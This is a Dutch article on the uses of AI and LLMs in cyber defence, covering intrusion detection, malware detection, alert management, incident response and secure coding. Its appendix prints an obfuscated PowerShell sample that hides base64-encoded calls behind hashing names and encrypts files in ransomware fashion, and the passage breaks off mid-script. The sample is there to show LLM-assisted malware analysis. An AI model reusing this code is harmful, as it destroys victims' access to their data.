<p>In principe zou een <em>Large Language Model</em> (LLM) getraind op grote gegevensbronnen zoals webfora, gespecialiseerde websites over kwetsbaarheden en incidenten, of sociale netwerken kunnen worden gebruikt om inlichtingenrapporten over cyberdreigingen te genereren. LLM’s zouden gebruikt kunnen worden om sneller toegang te krijgen tot technische documentatie en inlichtingen uit gespecialiseerde bronnen. Sewak et al. <a href="#_ref8">[8]</a> beweren dat LLM&#8217;s automatisch informatie uit verschillende bronnen kunnen extraheren, valideren en samenvatten, zoals dreigingsrapporten, literatuur, scripts enz. Ze wijzen er met name op dat LLM&#8217;s kwaadaardige bedoelingen in scripts kunnen identificeren. Hun aanpak is in staat om meer dan 90%<a href="#_ftn3" name="_ftnref3"><sup>3</sup></a> van de scripts te ontdekken die daadwerkelijk kwaadaardig zijn in een detectietaak.</p>
<h1 class="wp-block-heading">Detectie en identificatie van cyberaanvallen</h1>
<p>AI kan een rol spelen bij de detectie en identificatie van cyberaanvallen door inbraak- en malwaredetectiesystemen te verbeteren en waarschuwingen effectiever te beheren.</p>
<h2 class="wp-block-heading">Inbraakdetectie</h2>
<p>Volgens NIST <a href="#_ref9">[9]</a> verwijst een inbraakdetectiesysteem (IDS) naar “<em>het proces waarbij gebeurtenissen in een computersysteem of netwerk worden gemonitord en geanalyseerd op tekenen van mogelijke incidenten</em>.” Hoewel vroege ontwikkelingen van zulke systemen zich richtten op benaderingen die gebaseerd waren op handtekeningen, publiceerde Denning in 1986 een IDS-model <a href="#_ref10">[10]</a> gebaseerd op anomaliedetectie<a href="#_ftn4" name="_ftnref4"><sup>4</sup></a> dat vandaag de dag nog steeds de basis vormt van veel systemen. Het belangrijkste voordeel van anomaliedetectiemethoden is dat ze soorten incidenten kunnen detecteren die nog niet eerder zijn gezien. Vandaag de dag zijn het unsupervised machine learning methoden die vaak gebruikt worden voor anomaliedetectie: netwerkactiviteit wordt vergeleken met een vooraf getrainde en genormaliseerde baseline van normaal gedrag, waardoor het systeem onbekende kwaadaardige activiteit kan detecteren, in tegenstelling tot handtekeningmethoden.</p>
<p>Een benadering is om een artificieel neuraal netwerk te trainen om te leren of netwerkverkeer normaal is of overeenkomt met een klasse van aanvallen. In de praktijk gaat dit als volgt:</p>
<ol class="wp-block-list">
<li>Een expert verzamelt een dataset met zowel normaal netwerkverkeer als aanvallen.</li>
<li>Op een zeer krachtige machine wordt een neuraal netwerk getraind om het verschil tussen normaal verkeer en aanvalsverkeer te classificeren.</li>
<li>Een kopie van het in de vorige stap geleerde model wordt overgebracht naar het operationele inbraakdetectiesysteem van de organisatie.</li>
<li>Het inbraakdetectiesysteem past het model toe op het waargenomen netwerkverkeer.</li>
</ol>
<p>Er zijn veel leermethoden om uit te kiezen, maar volgens Appruzzese et al. <a href="#_ref11">[11]</a>, zijn unsupervised leermethoden bijzonder populair voor inbraakdetectiesystemen op communicatienetwerken vanwege de moeilijkheid en de kosten om gelabelde gegevens te verkrijgen. Bovendien is volgens deze auteurs de superioriteit van deep learning-netwerken voor inbraakdetectie in vergelijking met andere AI-technieken niet bewezen en rechtvaardigen de complexiteit en extra computerkosten niet noodzakelijk hun toepassing.</p>
<p>Hier volgen enkele voorbeelden van het gebruik van unsupervised technieken die worden gebruikt voor inbraakdetectie:</p>
<ul class="wp-block-list">
<li>Bohara et al. <a href="#_ref12">[12]</a> gebruiken verschillende anomaliedetectietechnieken, waaronder Principal Component Analysis (PCA), partitionering in -means en outlier-detectie op basis van de absolute mediaanafwijking om laterale<a href="#_ftn5" name="_ftnref5"><sup>5</sup></a> bewegingen in een netwerk te detecteren. De auteurs behaalden een <em>true positive rate</em> (TPR) van 88,7% en een <em>false positive rate</em> (FPR) van 14,1%.</li>
<li>In <a href="#_ref13">[13]</a>, presenteren de auteurs een methode voor het automatisch genereren van een grijze lijst van externe hosts die een hoge waarschijnlijkheid hebben om betrokken te zijn bij kwaadaardige taggingactiviteiten in verhouding tot de set van alle externe hosts waarmee de beschermde organisatie doorgaans contact opneemt. Hun voorstel is gebaseerd op clusteringstechnieken die worden toegepast op netwerkstromen.</li>
<li>Om het probleem van onevenwichtigheid tussen het aantal positieve en negatieve samples in inbraaklogs (doorgaans is er zeer weinig kwaadaardig verkeer in vergelijking met legitiem verkeer) aan te pakken, gebruiken Yang et al. <a href="#_ref14">[14]</a> een <em>Deep Convolutional Generative Adversarial Network</em> (DCGAN) om een realtime inbraakdetectiesysteem te bouwen. DCGAN houdt een balans tussen positieve en negatieve samples door nieuwe synthetische data te genereren. Om realtime analyse mogelijk te maken, gebruiken de auteurs <em>Gates Recurrent Units</em> (GRU), die efficiënter zijn dan een Long and <em>Short Term Memory</em> (LSTM) recurrent netwerk omdat ze minder parameters gebruiken. Het systeem bereikt een nauwkeurigheid van 99,73%.</li>
</ul>
<p>Tot slot zijn er ook tools op basis van LLM&#8217;s verschenen voor inbraakdetectie. De PentestGPT<a href="#_ftn6" name="_ftnref6"><sup>6</sup></a> tool is bijvoorbeeld een door LLM (in dit geval ChatGPT-4) geoptimaliseerde tool voor het testen van inbraken  die het testen van inbraken automatiseert door testers door de algemene werking en specifieke bewerkingen te leiden. PentestGPT is met succes getest op HackTheBox<a href="#_ftn7" name="_ftnref7"><sup>7</sup></a> en via verschillende Capture the Flag (CTF)-competities op eenvoudige en gemiddelde niveaus.</p>
<h2 class="wp-block-heading">Malware detecteren</h2>
<p>Machine learning kan worden gebruikt voor zowel statische als dynamische analyse van malware. Statische analyse is echter onderhevig aan relatief eenvoudige workarounds door de executable aan te passen zonder de onderliggende logica te veranderen of met meer geavanceerde varianten (bijv. polymorfisme) die de executable automatisch aanpassen.</p>
<p>Dynamische analyse in combinatie met machine learning is effectiever <a href="#_ref11">[11]</a>. Maar er zijn verschillende beperkingen voor de toepasbaarheid van de nieuwste academische ontwikkelingen op het gebied van machine learning voor de detectie van malware <a href="#_ref15">[15]</a>, waaronder:</p>
<ul class="wp-block-list">
<li>Misinterpretatie van de prestatiemeting, deels door het vergeten van de basisfrequentie &#8211; een cognitieve bias gekoppeld aan statistische wetten <a href="#_ftn8" name="_ftnref8"><sup>8</sup></a>;</li>
<li>Testdatabases zijn vaak enkele jaren oud en houden daarom geen rekening met de nieuwe bypassmethoden die worden geïmplementeerd door tegenstanders, of met de nieuwe programmeerinterfaces die beschikbaar zijn. Volgens <a href="#_ref16">[16]</a>, maakt een groot aantal recente onderzoeken naar federated learning voor inbraakdetectie nog steeds gebruik van publieke databases die voor 2017 zijn gemaakt, en dus met aanvallen die niet noodzakelijk de huidige communicatienetwerken weerspiegelen.</li>
</ul>
<h2 class="wp-block-heading">Alert management</h2>
<p>Het sorteren van beveiligingsalerts is een relatief tijdrovende taak, maar het kan worden versneld door contextuele informatie beschikbaar te maken voor analisten, zodat ze niet van de ene logging- of analysetool naar de andere hoeven te springen om te begrijpen wat er aan de hand is. Bijvoorbeeld: geolocatie van een IP-adres, naam van de organisatie die het IP beheert, leeftijd van het domein, reputatie van de hashwaarde van een bestand, type van het overeenkomstige bestand, automatische schermafbeelding van een URL, informatie over de host en zijn omgeving, enz. Deze alerts kunnen ook direct worden verrijkt door een LLM (bijv. categorisering, information issue van gespecialiseerde inlichtingendiensten, risicoscore).</p>
<p>Daarnaast kunnen machine-learningtechnieken worden gebruikt om waarschuwingen te filteren, te sorteren, te prioriteren en te aggregeren om triage en incidentrespons te vergemakkelijken. Su et al. <a href="#_ref17">[17]</a> stellen bijvoorbeeld een methode voor om fout-positieve filtering te automatiseren met behulp van kernel density estimation (KDE)<a href="#_ftn9" name="_ftnref9"><sup>9</sup></a>. Volgens de auteurs vermindert dit de tijd die nodig is om alerts te controleren met 75%.</p>
<h1 class="wp-block-heading">Reageren op cybersecurityincidenten</h1>
<p>De reactie op incidenten is een belangrijk onderdeel van de cybersecuritystrategie van een organisatie. Een goed voorbereide reactie kan de schade van een veiligheidsinbreuk of een cyberaanval helpen beperken. De snelheid en nauwkeurigheid van deze reacties is echter van het grootste belang. LLM&#8217;s kunnen helpen deze processen te versnellen en te stroomlijnen, door geautomatiseerde reacties te geven en zelfs te helpen bij het ontwikkelen van incident response plannen. Een van de kenmerken van de LLM-architectuur is de mogelijkheid om natuurlijke, contextgebaseerde tekst te genereren. Dit kan worden gebruikt om een AI-gestuurde assistent voor incidentrespons te maken, die tijdens een incident direct advies kan geven en gebeurtenissen automatisch kan documenteren terwijl ze zich voordoen. PaloAlto XSOAR<a href="#_ftn10" name="_ftnref10"><sup>10</sup></a> gebruikt bijvoorbeeld ChatGPT om handleidingen te genereren voor het omgaan met bepaalde aanvallen (zie Figuur 1).</p>
<table class=" aligncenter" style="width: 80%; background-color: #a0a0a0; border-style: solid;" cellpadding="5">
    <tbody>
    <tr>
    <td>
    <p>Dear Analyst,</p>
    <p>The following is an analysis for Incident No. #3332 by ChatGPT:</p>
    <p><strong>1- Analysis (Incident Description):</strong></p>
    <p>On Tuesday 2023-May-09 at 12:46:03 PM, a workstation with the hostname &#8220;testlab&#8221; was compromised through the MitreAttack technique of OS Credential Dumping by the Poseidon Group. The indicator of compromise, 31ebide7840a342fd468e558e5ab627bcb4c542a8fe01aec4d5ba01d539aOfc, has a malicious reputation.</p>
    <p><strong>2- Impact Analysis:</strong></p>
    <p>The compromised workstation may have granted the attacker access to sensitive information and credentials on the network, which could potentially lead to further attacks and data breaches. The Poseidon Group is a known advanced persistent threat (APT) group, and their attacks are often highly targeted and sophisticated, making it imperative to respond quickly and effectively to mitigate potential damage.</p>
    <p><strong>3- Action or Recommendations:</strong></p>
    <ol style="list-style-type: lower-alpha;">
    <li>Isolate the compromised workstation: The first step in responding to a security incident is to isolate the compromised system from the network to prevent further damage or spread of the attack. The compromised workstation with the IP address 10.10.10.10 should be taken offline immediately to prevent the attacker from further accessing or exfiltrating sensitive information.</li>
    <li>Conduct a forensic investigation: A thorough forensic investigation should be conducted to determine the extent of the damage and whether any other machines on the network have been compromised. The investigation should aim to identify the initial point of entry, the scope of the attack, and any data that may have been exfiltrated by the attacker.</li>
    <li>Remediate and patch vulnerabilities: The investigation should identify any vulnerabilities or weaknesses in the security infrastructure that allowed the attack to take place and patch or remediate these as quickly as possible to prevent similar incidents from occurring in the future.</li>
    <li>Deploy additional security measures: Additional security measures may need to be deployed to prevent further attacks by the Poseidon Group or other APT groups. This may include deploying intrusion detection and prevention systems, implementing Two-Factor Authentication (2FA), and training employees on how to identify and respond to potential security incidents.</li>
    <li>Notify appropriate authorities: Depending on the sensitivity and nature of the data that may have been compromised, it may be necessary to notify appropriate authorities such as law enforcement or regulatory bodies.</li>
    </ol>
    <p>The company should review their incident response plan and determine the appropriate steps to take regarding notification and disclosure.</p>
    <p>&#8212;<br />Your SOC Team<br />Cortex XSOAR</p>
    </td>
    </tr>
    </tbody>
    </table>
<p><em>Figuur 1 &#8211; Door XSOAR voorgestelde informatie om een reactie op een beveiligingsincident te beheren (uit <a href="#_ref18">[18]</a>).</em></p>
<p>Ferrag et al. <a href="#_ref19">[19]</a> gebruiken FalconLLM<a href="#_ftn11" name="_ftnref11"><sup>11</sup></a> om de ernst en potentiële impact te analyseren van een aanval die is geïdentificeerd door een inbraakdetectiesysteem door deze te vergelijken met de interne database. Op een vergelijkbare manier als PaloAlto XSOAR kan de tool ook suggesties doen voor mogelijke mitigatiestrategieën en herstelprocedures, die als leidraad kunnen dienen voor een responsteam. De voorgestelde antwoorden blijven echter erg algemeen en zijn mogelijk niet bruikbaar voor een ervaren beheerder (zie Figuur 2).</p>
<table class=" aligncenter" style="width: 80%; background-color: #a0a0a0; border-style: solid;" cellpadding="5">
    <tbody>
    <tr>
    <td style="width: 100%;">
    <p><strong>Cyber Threats detected by SecurityBERT:</strong></p>
    <p>SecurityBERT has detected a cyber threat in our industrial network: a Backdoor attack. Can you propose to me a mitigation solution?</p>
    <p><strong>FalconLLM model incident response and recovery output:</strong></p>
    <p>Yes, I can. There are a few steps that can be taken to mitigate the Backdoor threat. Firstly, it&#8217;s important to identify the source of the attack. This could be done by monitoring the network traffic and looking for any suspicious activity. Once the source has been identified, it&#8217;s important to block any further attempts to access the network. This can be done by implementing firewalls, intrusion detection systems, and other security measures. Additionally, it&#8217;s important to update all software and patches to ensure that the network is as secure as possible. It&#8217;s also a good idea to regularly audit the network for any potential vulnerabilities.</p>
    </td>
    </tr>
    </tbody>
    </table>
<p><em>Figuur 2 – voorbeeld van een door FalconLLM voorgestelde risicobeperkende strategie (bron <a href="#_ref19">[19]</a>).</em></p>
<p>Generatieve AI kan ook worden gebruikt om bepaalde aspecten van de analyse van cyberincidenten door analisten in een veiligheidsoperatiecentrum te automatiseren. Volgens A. Krishnan <a href="#_ref20">[20]</a> kan ChatGPT bijvoorbeeld worden gebruikt om te beschrijven wat een Powershellscript doet (zie voorbeeld in bijlage). Op dezelfde manier zouden deze tools, omdat ze ook code kunnen genereren, gebruikt kunnen worden om het voor analisten eenvoudiger te maken om loganalysescripts te schrijven (zie bijlage).</p>
<p>De automatisering van de incidentrespons wordt ook overwogen, maar een groot probleem blijft de toewijzing van de verantwoordelijkheid. Dit wordt nog bemoeilijkt door het feit dat AI-systemen tot nu toe niet erg transparant en moeilijk uit te leggen zijn.</p>
<p>Tot slot spelen gedetailleerde rapporten over cybersecurity-incidenten een belangrijke rol bij het helpen van belangrijke stakeholders, waaronder operationele beveiligingsteams en beveiligingsmanagers, om de beveiligingshuishouding van een organisatie beter te begrijpen en te verbeteren. Sommigen overwegen het gebruik van generatieve AI om logs van incidenten te synthetiseren en rapporten te schrijven om sneller actie te kunnen ondernemen.</p>
<h1 class="wp-block-heading">Veilig code genereren</h1>
<p>Kwetsbaarheden in code zijn een terugkerend probleem dat de meeste software treft en een impact heeft op integriteit, vertrouwelijkheid en beschikbaarheid. Er wordt aangeraden om bepaalde programmeertalen te gebruiken waarvan bekend is dat ze minder gevoelig zijn voor klassieke problemen dan andere (bijv. Rust in plaats van C). Code review door andere expertprogrammeurs is ook een veelgebruikte methode.</p>
<p>Maar de analyse van Ganseman <a href="#_ref21">[21]</a> roept de vraag op of LLM&#8217;s nuttig zijn om fouten of bugs in bestaande code op te sporen of om te helpen veiligere code te schrijven. De moeilijkheid ligt in het feit dat het voorlopig nodig is om de mogelijke plaatsen aan te geven waar de code niet veilig is, dat wil zeggen dat het aan de ontwikkelaar is om te detecteren waar een verbetering mogelijk is. Het kan zijn dat in de nabije toekomst een hele code base aan een security review kan worden onderworpen, maar op dit moment is dit beperkt tot de lengte van de context en hoe preciezer de vraag, hoe beter het antwoord.</p>
<p>Paradoxaal genoeg rapporteerden Perry et al. <a href="#_ref22">[22]</a> in een recent onderzoek dat, hoewel assistenten de productiviteit van ontwikkelaars verhogen, deelnemers met toegang tot een assistent gebaseerd op een AI-model (in dit geval OpenAI&#8217;s <em>codex-davinci-002</em>) significant minder veilige code schreven dan degenen zonder toegang. Erger nog, deelnemers met toegang tot de assistent geloofden vaker dat ze veilige code schreven dan deelnemers zonder toegang. Het gebruik van wizards vereist daarom de implementatie van systematische codecontrole en statische analyse <a href="#_ref21">[21]</a>.</p>
<h1 class="wp-block-heading">Conclusie</h1>
<p>Hoewel AI op veel gebieden bliksemsnelle vooruitgang boekt, is de niet te verwaarlozen bijdrage ervan aan de verdediging van IT-systemen nog steeds beperkt: we zijn nog ver verwijderd van tools waarmee het voldoende zou zijn om terabytes aan eventlogs aan te bieden om tekenen van inbraak snel en met weinig fouten te detecteren.</p>
<p>Vandaag de dag wordt er nog steeds veel onderzoek gedaan naar gespecialiseerde statistische en machine learning methoden &#8211; zoals anomaliedetectie &#8211; en worden deze toegevoegd aan commerciële tools voor inbraakdetectie met het label “AI”. Maar bij nader inzien blijkt AI vooral een nieuwe ‘productiviteitstool’ te zijn voor cybersecurityprofessionals, die helpt bij het automatiseren van bepaalde cyberdefensietaken of bij het faciliteren van incidentrespons en die de verwerking van informatie over bedreigingen vergemakkelijkt, maar niet de menselijke analist vervangt.</p>
<h1 class="wp-block-heading">Referenties</h1>
<p><a name="_ref1"></a>[1]        B. Schneier, ‘Artificial Intelligence and the Attack/Defense Balance’, <em>IEEE Secur. Priv.</em>, vol. 16, nr. 2, pp. 96-96, mrt. 2018, doi: <a href="https://doi.org/10.1109/MSP.2018.1870857" target="_blank" rel="noopener noopnener">10.1109/MSP.2018.1870857</a></p>
<p><a name="_ref2"></a>[2]        I. H. Sarker, H. Janicke, L. Maglaras, en S. Camtepe, ‘Data-Driven Intelligence can Revolutionize Today’s Cybersecurity World: A Position Paper’. arXiv, 9 augustus 2023. Geraadpleegd: 27 oktober 2023. [Online]. Beschikbaar op: <a href="https://arxiv.org/abs/2308.05126" target="_blank" rel="noopener noopnener">http://arxiv.org/abs/2308.05126</a></p>
<p><a name="_ref3"></a>[3]        J. D’Hoinne, A. Litan, en P. Firstbrook, ‘4 Ways Generative AI Will Impact CISOs and Their Teams’, Gartner, G00793265, jun. 2023.</p>
<p><a name="_ref4"></a>[4]        M. Taddeo, T. McCutcheon, en L. Floridi, ‘Trusting artificial intelligence in cybersecurity is a double-edged sword’, <em>Nat. Mach. Intell.</em>, vol. 1, nr. 12, pp. 557-560, nov. 2019, doi: <a href="https://doi.org/10.1038/s42256-019-0109-1" target="_blank" rel="noopener noopnener">10.1038/s42256-019-0109-1</a></p>
<p><a name="_ref5"></a>[5]        D. Dasgupta, Z. Akhtar, en S. Sen, ‘Machine learning in cybersecurity: a comprehensive survey’, <em>J. Def. </em><em>Model. Simul. Appl. Methodol. Technol.</em>, vol. 19, nr. 1, pp. 57-106, jan. 2022, doi: <a href="https://doi.org/10.1177/1548512920951275" target="_blank" rel="noopener noopnener">10.1177/1548512920951275</a></p>
<p><a name="_ref6"></a>[6]        M. Nouh, J. R. C. Nurse, H. Webb, en M. Goldsmith, ‘Cybercrime Investigators are Users Too! Understanding the Socio-Technical Challenges Faced by Law Enforcement’, in <em>Proceedings 2019 Workshop on Usable Security</em>, 2019. doi: <a href="https://doi.org/10.14722/usec.2019.23032" target="_blank" rel="noopener noopnener">10.14722/usec.2019.23032</a></p>
<p><a name="_ref7"></a>[7]        J. R. G. Evangelista, R. J. Sassi, M. Romero, en D. Napolitano, ‘Systematic Literature Review to Investigate the Application of Open Source Intelligence (OSINT) with Artificial Intelligence’, <em>J. Appl. Secur. Res.</em>, vol. 16, nr. 3, pp. 345-369, jul. 2021, doi: <a href="https://doi.org/10.1080/19361610.2020.1761737" target="_blank" rel="noopener noopnener">10.1080/19361610.2020.1761737</a></p>
<p><a name="_ref8"></a>[8]        M. Sewak, V. Emani, en A. Naresh, ‘CRUSH: Cybersecurity Research using Universal LLMs and Semantic Hypernetworks’, 2023.</p>
<p><a name="_ref9"></a>[9]        K. A. Scarfone en P. M. Mell, ‘Guide to intrusion detection and prevention systems (IDPS)’, National Institute of Standards and Technology, Gaithersburg, MD, NIST SP 800-94, 2007. doi: <a href="https://doi.org/10.6028/NIST.SP.800-94" target="_blank" rel="noopener noopnener">10.6028/NIST.SP.800-94</a></p>
<p><a name="_ref10"></a>[10]      D. Denning, ‘An Intrusion-Detection Model’, <em>IEEE Trans. </em><em>Softw. Eng.</em>, vol. 13, nr. 2, pp. 222-232, 20.</p>
<p><a name="_ref11"></a>[11]      G. Apruzzese <em>e.a.</em>, ‘The role of machine learning in cybersecurity’, <em>Digit. Threats Res. Pract.</em>, vol. 4, nr. 1, pp. 1-38, mrt. 2023, doi: <a href="https://doi.org/10.1145/3545574" target="_blank" rel="noopener noopnener">10.1145/3545574</a></p>
<p><a name="_ref12"></a>[12]      A. Bohara, M. A. Noureddine, A. Fawaz, en W. H. Sanders, ‘An Unsupervised Multi-Detector Approach for Identifying Malicious Lateral Movement’, in <em>2017 IEEE 36th Symposium on Reliable Distributed Systems (SRDS)</em>, Hong Kong, Hong Kong: IEEE, sep. 2017, pp. 224-233. doi: <a href="https://doi.org/10.1109/SRDS.2017.31" target="_blank" rel="noopener noopnener">10.1109/SRDS.2017.31</a></p>
<p><a name="_ref13"></a>[13]      G. Apruzzese, M. Marchetti, M. Colajanni, G. G. Zoccoli, en A. Guido, ‘Identifying malicious hosts involved in periodic communications’, in <em>2017 IEEE 16th International Symposium on Network Computing and Applications (NCA)</em>, Cambridge, MA: IEEE, okt. 2017, pp. 1-8. doi: <a href="https://doi.org/10.1109/NCA.2017.8171326" target="_blank" rel="noopener noopnener">10.1109/NCA.2017.8171326</a></p>
<p><a name="_ref14"></a>[14]      J. Yang, T. Li, G. Liang, W. He, en Y. Zhao, ‘A Simple Recurrent Unit Model Based Intrusion Detection System With DCGAN’, <em>IEEE Access</em>, vol. 7, pp. 83286-83296, 2019, doi: <a href="https://doi.org/10.1109/ACCESS.2019.2922692" target="_blank" rel="noopener noopnener">10.1109/ACCESS.2019.2922692</a></p>
<p><a name="_ref15"></a>[15]      L. Cavallaro, J. Kinder, F. Pendlebury, en F. Pierazzi, ‘Are Machine Learning Models for Malware Detection Ready for Prime Time?’, <em>IEEE Secur. Priv.</em>, vol. 21, nr. 2, pp. 53-56, mrt. 2023, doi: <a href="https://doi.org/10.1109/MSEC.2023.3236543" target="_blank" rel="noopener noopnener">10.1109/MSEC.2023.3236543</a></p>
<p><a name="_ref16"></a>[16]      J. L. Hernández-Ramos <em>e.a.</em>, ‘Intrusion detection based on federated learning: a systematic review’. arXiv, 18 augustus 2023. Geraadpleegd: 17 oktober 2023. [Online]. Beschikbaar op: <a href="https://arxiv.org/abs/2308.09522" target="_blank" rel="noopener noopnener">http://arxiv.org/abs/2308.09522</a></p>
<p><a name="_ref17"></a>[17]      Y.-H. Su, M. C. Y. Cho, en H.-C. Huang, ‘False Alert Buster: an Adaptive Approach for NIDS False Alert Filtering’, in <em>Proceedings of the 2nd International Conference on Computing and Big Data</em>, Taichung Taiwan: ACM, okt. 2019, pp. 58-62. doi: <a href="https://doi.org/10.1145/3366650.3366657" target="_blank" rel="noopener noopnener">10.1145/3366650.3366657</a></p>
<p><a name="_ref18"></a>[18]      M. Gupta, C. Akiri, K. Aryal, E. Parker, en L. Praharaj, ‘From ChatGPT to ThreatGPT: Impact of generative AI in cybersecurity and privacy’, <em>IEEE Access</em>, vol. 11, pp. 80218-80245, aug. 2023, doi: <a href="https://doi.org/10.1109/ACCESS.2023.3300381" target="_blank" rel="noopener noopnener">10.1109/ACCESS.2023.3300381</a></p>
<p><a name="_ref19"></a>[19]      M. A. Ferrag, M. Ndhlovu, N. Tihanyi, L. C. Cordeiro, M. Debbah, en T. Lestable, ‘Revolutionizing Cyber Threat Detection with Large Language Models’. arXiv, 25 juni 2023. Geraadpleegd: 8 november 2023. [Online]. Beschikbaar op: <a href="https://arxiv.org/abs/2306.14263" target="_blank" rel="noopener noopnener">http://arxiv.org/abs/2306.14263</a></p>
<p><a name="_ref20"></a>[20]      A. Krishnan, ‘4 ChatGPT cybersecurity benefits for the enterprise | TechTarget’, Security. Geraadpleegd: 12 oktober 2023. [Online]. Beschikbaar op: <a href="https://www.techtarget.com/searchsecurity/tip/ChatGPT-cybersecurity-benefits-for-the-enterprise" target="_blank" rel="noopener noopnener">https://www.techtarget.com/searchsecurity/tip/ChatGPT-cybersecurity-benefits-for-the-enterprise</a></p>
<p><a name="_ref21"></a>[21]      J. Ganseman, ‘LLM pour code : the Good, the Bad and the Ugly | Smals Research’, Smals Research Blog. Geraadpleegd: 18 oktober 2023. [Online]. Beschikbaar op: <a href="/llms-pour-code/" target="_blank" rel="noopener noopnener">/llms-pour-code/</a></p>
<p><a name="_ref22"></a>[22]      N. Perry, M. Srivastava, D. Kumar, en D. Boneh, ‘Do Users Write More Insecure Code with AI Assistants?’ arXiv, 16 december 2022. Geraadpleegd: 3 oktober 2023. [Online]. Beschikbaar op: <a href="https://arxiv.org/abs/2211.03622" target="_blank" rel="noopener noopnener">http://arxiv.org/abs/2211.03622</a></p>
<h1 class="wp-block-heading">Bijlage 1 – Kwaadaardige scriptanalyse met ChatGPT</h1>
<p>In het onderstaande voorbeeld zie je het antwoord van ChatGPT 4.0 op de vraag “Wat doet deze code?” gevolgd door een codevoorbeeld. Ondanks de poging tot verduistering en het foutieve commentaar, kan worden gezien dat ChatGPT dit script, dat alle bestanden in de map “<code>C:\local\chat_gpt_ps\test</code>” en de submappen versleutelt, correct analyseert.</p>
<h2 class="wp-block-heading">Script ingevoerd in ChatGPT</h2>
<div>
<pre><code><span style="color: #0000ff;">function </span><span style="color: #795e00;">Compute_SHA256 </span>{</code><br /><code>    <span style="color: #008000;"># Compute SHA 256 of an object in memory</span></code><br /><code>    [<span style="color: #795e00;">CmdletBinding</span>()]</code><br /><code>    [<span style="color: #795e00;">OutputType</span>([<span style="color: #0000ff;">string</span>])]</code><br /><code>    <span style="color: #af00db;">Param</span></code><br /><code>    (</code><br /><code>        [<span style="color: #795e00;">Parameter</span>(<span style="color: #001080;">Mandatory </span>= <span style="color: #0000ff;">$true</span>)]</code><br /><code>        [<span style="color: #0000ff;">String</span>]<span style="color: #001080;">$salt</span>,</code><br /><code>        [<span style="color: #795e00;">Parameter</span>(<span style="color: #001080;">Mandatory </span>= <span style="color: #0000ff;">$true</span>, <span style="color: #001080;">ParameterSetName </span>= <span style="color: #a31515;">"param"</span>)]</code><br /><code>        [<span style="color: #0000ff;">String</span>]<span style="color: #001080;">$object</span></code><br /><code>    )</code><br /><code>    <span style="color: #af00db;">Begin</span> {</code><br /><code>        <span style="color: #008000;"># Initialise hashing function</span></code><br /><code>        <span style="color: #001080;">$tmp</span> = <span style="color: #795e00;">New-Object</span> byte[] <span style="color: #008000;">16</span></code><br /><code>        <span style="color: #001080;">$sha1</span> = <span style="color: #795e00;">New-Object</span> System.Security.Cryptography.SHA256Managed</code><br /><code>        <span style="color: #001080;">$sha2</span> = <span style="color: #795e00;">New-Object</span> System.Security.Cryptography.AesManaged</code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.Mode</span> = <span style="color: #a31515;">'CBC'</span> -as [<span style="color: #0000ff;">System.Security.Cryptography.CipherMode</span>]</code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.Padding</span> = <span style="color: #a31515;">'Zeros'</span> -as [<span style="color: #0000ff;">System.Security.Cryptography.PaddingMode</span>]</code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.BlockSize</span> = <span style="color: #008000;">128</span></code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.KeySize</span> = <span style="color: #008000;">256</span></code><br /><code>        [<span style="color: #0000ff;">void</span>][<span style="color: #0000ff;">Security.Cryptography.RNGCryptoServiceProvider</span>]::Create().GetBytes($tmp)</code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.IV</span> = <span style="color: #001080;">$tmp</span></code><br /><code>    }</code><br /><code>    <span style="color: #af00db;">Process</span> {</code><br /><code>        <span style="color: #008000;"># Compute hash</span></code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.Key</span> = <span style="color: #001080;">$sha1</span><span style="color: #795e00;">.ComputeHash</span>([<span style="color: #0000ff;">System.Text.Encoding</span>]::UTF8.GetBytes($salt))</code><br /><code>        <span style="color: #001080;">$dynCmd</span> = [<span style="color: #0000ff;">System.Text.Encoding</span>]::UTF8.GetString([<span style="color: #0000ff;">Convert</span>]::FromBase64String(<span style="color: #a31515;">"R2V0LUl0ZW0gLVBhdGggJG9iamVjdCAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ=="</span>))</code><br /><code>        <span style="color: #001080;">$object2</span> = <span style="color: #795e00;">Invoke-Expression</span> <span style="color: #001080;">$dynCmd</span></code><br /><code>        <span style="color: #af00db;">if</span> (!<span style="color: #001080;">$object2</span><span style="color: #795e00;">.FullName</span>) {</code><br /><code>            <span style="color: #af00db;">break</span></code><br /><code>        }</code><br /><code>        <span style="color: #001080;">$dynCmd</span> = [<span style="color: #0000ff;">System.Text.Encoding</span>]::UTF8.GetString([<span style="color: #0000ff;">Convert</span>]::FromBase64String(<span style="color: #a31515;">"W1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbEJ5dGVzKCRvYmplY3QyLkZ1bGxOYW1lKQ=="</span>))</code><br /><code>        <span style="color: #001080;">$input</span> = <span style="color: #795e00;">Invoke-Expression</span> <span style="color: #001080;">$dynCmd</span></code><br /><code>        <span style="color: #001080;">$output</span> = <span style="color: #001080;">$object2</span><span style="color: #795e00;">.FullName</span> + <span style="color: #a31515;">".xxx"</span></code><br /><code>        <span style="color: #001080;">$sha2_hasher</span> = <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.CreateEncryptor</span>()</code><br /><code>        <span style="color: #001080;">$encryptedBytes</span> = <span style="color: #001080;">$sha2_hasher</span><span style="color: #795e00;">.TransformFinalBlock</span>($input, 0, $input.Length)</code><br /><code>        <span style="color: #001080;">$encryptedBytes</span> = <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.IV</span> + <span style="color: #001080;">$encryptedBytes</span></code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.Dispose</span>()</code><br /><code>       </code><br /><code>        <span style="color: #001080;">$e</span> = <span style="color: #001080;">$output</span></code><br /><code>        <span style="color: #001080;">$encD</span> = <span style="color: #001080;">$encryptedBytes</span></code><br /><code>        <span style="color: #001080;">$dynCmd</span> = [<span style="color: #0000ff;">System.Text.Encoding</span>]::UTF8.GetString([<span style="color: #0000ff;">Convert</span>]::FromBase64String(<span style="color: #a31515;">"W1N5c3RlbS5JTy5GaWxlXTo6V3JpdGVBbGxCeXRlcygkZSwgJGVuY0Qp"</span>))</code><br /><code>        <span style="color: #795e00;">Invoke-Expression</span> <span style="color: #001080;">$dynCmd</span></code><br /><code>        (<span style="color: #795e00;">Get-Item</span> <span style="color: #001080;">$output</span>).LastWriteTime = 